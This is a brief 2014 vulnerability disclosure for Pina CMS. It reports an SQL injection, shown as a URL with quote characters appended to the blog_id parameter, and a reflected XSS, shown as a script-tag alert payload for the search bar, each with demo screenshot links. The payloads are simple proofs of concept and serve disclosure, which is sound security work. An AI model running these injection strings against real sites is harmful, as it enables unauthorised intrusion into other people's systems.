34 lines
No EOL
1.1 KiB
Text
34 lines
No EOL
1.1 KiB
Text
############################################################################
|
|
# Title: Pina CMS SQL Injection and XSS Vulnerabilities
|
|
# Vendor: www.pinacms.com
|
|
# Vendor Notified: 15-02-2014
|
|
# Vendor Replied: 16-02-2014
|
|
# Release in Public: 18-02-2014
|
|
# Tested on: Windows/Linux
|
|
# Author/Found by: Shadman Tanjim
|
|
# Website: www.secupent.com and www.vulnerability.io
|
|
# Email: service@secupent.com or shadman2600@gmail.com
|
|
# Twitter: twitter.com/secupent
|
|
# Facebook: fb.me/secupent
|
|
############################################################################
|
|
|
|
1. Vulnerability no 1 (SQL Injection):
|
|
|
|
http://target.com/page.php?action=post.manage.home&blog_id=1%27%22
|
|
|
|
Demo screenshot: https://www.dropbox.com/s/cpxvk7h1dxu8xnv/pina2.png
|
|
|
|
2. Vulnerability no 2. (XSS):
|
|
|
|
Go to this link: http://target.com/page.php?action=post.manage.home
|
|
|
|
Apply this JavaScript on search bar
|
|
|
|
"/><script>alert(574127);</script>
|
|
|
|
Demo screenshot: https://www.dropbox.com/s/8jc51blyepypfas/pina1.png
|
|
|
|
|
|
|
|
|
|
Greets: Sayem Islam, Maruf Alam, Isti Ak Ahmed, Team BCA, Team Secupent and all Cyber Security Expert and Bug Hunters..... |